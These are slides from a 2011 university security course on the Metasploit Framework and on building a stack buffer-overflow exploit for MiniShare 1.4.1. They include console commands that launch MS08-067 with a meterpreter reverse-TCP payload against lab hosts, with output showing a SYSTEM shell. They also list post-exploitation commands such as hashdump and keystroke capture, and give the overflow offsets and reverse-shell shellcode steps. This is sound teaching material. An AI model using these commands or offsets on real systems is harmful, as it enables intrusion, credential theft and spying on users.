91.661 Project - 1 5/4/2011 The University of Massachusetts Lowell Anthony Gabrielson Adam Helbling

91.661 Project - 1 5/4/2011

The University of Massachusetts Lowell

Anthony Gabrielson

Adam Helbling

The University of Massachusetts Lowell91.661 Project - 2

5/4/2011

Agenda

• Part 2: From ‘ploit’ to ‘ploit’– Overview– Assumptions– Environment Setup– Ollydbg Introduction– Vulnerability Explanation– Crafting the Exploit– Metasploit Enablers– Adding Shellcode

• Part 1: The Metasploit Framework– Basics– Running Metasploit– The Exploit– Demo– More on Exploits


5/4/2011

The Metasploit Framework: Basics

• Created in 2003 by HD Moore

• Vitals– BSD License– 700K lines of Ruby

• Currently produced by Rapid 7

• De facto standard in vulnerability development framework– Commercial Alternatives

Rapid 7 has many commercial implementations Immunities CANVAS Core Impact


5/4/2011

The Metasploit Framework: Basics (cont’d)

• Metasploit is a well known anti-forensic and evasion tool• Modular for ease of development and portability

• msfupdate• Get the latest & greatest exploits

• msfconsole• The console – also works as a command shell

• Exploit Automation• Db_autopwn

• Very noisy• Requires a database


5/4/2011

The Metasploit Framework: Running Metasploit


5/4/2011

The Metasploit Framework: The Exploit

• ms08_067_netapi (RANK: Great)– This module exploits a parsing flaw in the path

canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.

– This attack can be prevented with the MS08-067 patch.


5/4/2011

The Metasploit Framework: Demo


5/4/2011

The Metasploit Framework: Demo Walkthrough

• Msfconsole– use exploit/windows/smb/ms08_067_netapi– set PAYLOAD windows/meterpreter/reverse_tcp– set RHOST [remote host] 192.168.11.51– set LHOST [local host] 192.168.11.53– show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.11.51 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, none, process LHOST 192.168.11.53 yes The listen address LPORT 4444 yes The listen port

– Exploit


5/4/2011

The Metasploit Framework: More about the Exploit

• msf exploit(ms08_067_netapi) > show targets

Exploit targets:

Id Name -- ---- 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows XP SP2 English (NX) 4 Windows XP SP3 English (NX)…61 Windows 2003 SP2 Japanese (NO NX)


5/4/2011

The Metasploit Framework: Meterpreter Commands

• Commands– meterpreter > sysinfo

System Language : en_US OS : Windows XP (Build 2600, Service Pack 2). Computer : AGABRIEL-B90B23 Architecture : x86 Meterpreter : x86/win32

– meterpreter > getuid Server username: NT AUTHORITY\SYSTEM

– meterpreter > shell Process 396 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

– More Hashdump Upload Webcam_snap keybscan_{start, stop, dump} ps


5/4/2011

• Q: What can you do with a known vulnerability?– Craft an exploit, execute from a command-line– What else?

• Metasploit is not perfect, but it has its place.– Repository– Framework– Tools to help build exploits– Ease of use

• Generic shellcode vs. robust shellcode • Challenges:

– Crafting the exploit– Reuse of an exploit

From ploit to ploit: Overview

…or how to add a generic exploit to your metasploit arsenal


5/4/2011

From ploit to ploit: Assumptions

• Already spent resources (time, money, etc.) to discover a vulnerability via one (or all) of the following:– Fuzzing– Static disassembly– Review of source code– Known vulnerability

CVE we found on (http://cve.mitre.org/) Security Advisory (http://secunia.com/advisories)

– Known Exploit Exploit DB (http://www.exploit-db.com/exploits)

http://cve.mitre.org/

http://secunia.com/advisories

http://www.exploit-db.com/exploits


5/4/2011

From ploit to ploit: Environment Setup

• Vulnerability: MiniShare HTTP “GET” Request Buffer Overflow Vulnerability

• Exploit: MiniShare Remote Buffer Overflow Exploit (c source)

• Windows XP SP2 (or really any XP version)• MiniShare 1.4.1• Ollydbg 1.10• Backtrack 4

– Metasplioit– Python– Netcat

http://secunia.com/advisories/13114

http://secunia.com/advisories/13114

http://www.exploit-db.com/exploits/636

http://www.exploit-db.com/exploits/636


5/4/2011

From ploit to ploit: Ollydbg Introduction

• Main Pane:– CPU Instructions (Microsoft Assembler format)

• Memory Pane:– Current section of memory where the code is executing

• Registers Pane:– EIP: Address of next instruction to be executed– ESP: Stack pointer

• Stack Pane:– Shows the entries on stack


5/4/2011

From ploit to ploit: Vulnerability Explanation

• HTTP GET with a large (>1787 bytes) request– GET [a string of >1787 bytes] HTTP/1.1\r\n\r\n

• EIP = 0x41414141– Access violation when reading [41414141]– EIP points to the address containing the next

instruction, but 0x41414141 throws an access violation.• ESP = the address of the buffer that was overflowed.

– Note the “AAAAAAAAAAAAAAAAAA……AAAA”


5/4/2011

From ploit to ploit: Crafting the Exploit

• This approach is different then the lab exercise assigned.– We are not overwriting stack’s return address here– Instead let’s find an instruction in the code to transfer our

execution: \xFF\xE4 = JMP ESP – Jump to the address stored in ESP. Overwrite EIP with the address of a JMP ESP instruction.

• More robust to some degree because we will pick an address that is predictable and will work across more systems.– In Win XP SP2 there is no randomization of base location for

where DLLs are loaded, therefore if we chose a DLL it will work on each system that loads this DLL.

– However, the best choice would be a DLL provided with MiniShare, however, there are none, so we revert to using a Windows DLL.


5/4/2011

From ploit to ploit: Metasploit Enablers

• /pentest/exploits/framework3/tools/pattern_create.rb– Creates a unique pattern of a user specified length.

Useful for understanding the offsets within the buffer where we overwrite.

• /pentest/exploits/framework3/tools/pattern_offset.rb– Returns the location of where EIP is overwritten and

where ESP points to. Finds offsets using from the pattern generated by

pattern_create.rb

• EIP overwritten at 1787 bytes into our buffer• ESP points to location 1791 bytes into our buffer


5/4/2011

From ploit to ploit: Adding Shellcode

• Using msfpayload which comes with Metasploit we will create a useful piece of shellcode which creates a reverse shell on a port.– What is a reverse shell?– Note: Does this give us away?!– C style vs. raw output (‘R’ vs. ‘C’)

• Does anyone see a problem with some of this shellcode?– Msfencode can help us…

• Let’s add some NOP’s to help improve stability.

• Now all that would need to be done is to add this to Metasploit as a ruby script. (Note: It’s already in there)


5/4/2011

References and Conclusions

• http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html

• This presentation just begins to scratch the surface– http://www.offensive-security.com/metasploit-unleashe

d/Metasploitable

Questions?

http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html

http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html

http://www.offensive-security.com/metasploit-unleashed/Metasploitable

http://www.offensive-security.com/metasploit-unleashed/Metasploitable


5/4/2011

The Metasploit Framework: The Exploit (2)

• psexec– light-weight telnet-replacement that lets you execute

processes on other systems– This module uses a valid administrator username and

password (or password hash) to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.

– This one has more, list ‘em


5/4/2011

The Exploit (3)

• ms05_039_pnp– Vulnerability in Plug and Play Could Allow Remote

Code Execution and Elevation of Privilege– This module exploits a stack buffer overflow in the

Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. NOTE: Since the PnP service runs inside the service.exe process, a failed exploit attempt will cause the system to automatically reboot.

– Affected Systems: Win2k SP4, Win XP SP2, etc…

Documents

91.661 Project - 1 5/4/2011 The University of Massachusetts Lowell Anthony Gabrielson Adam Helbling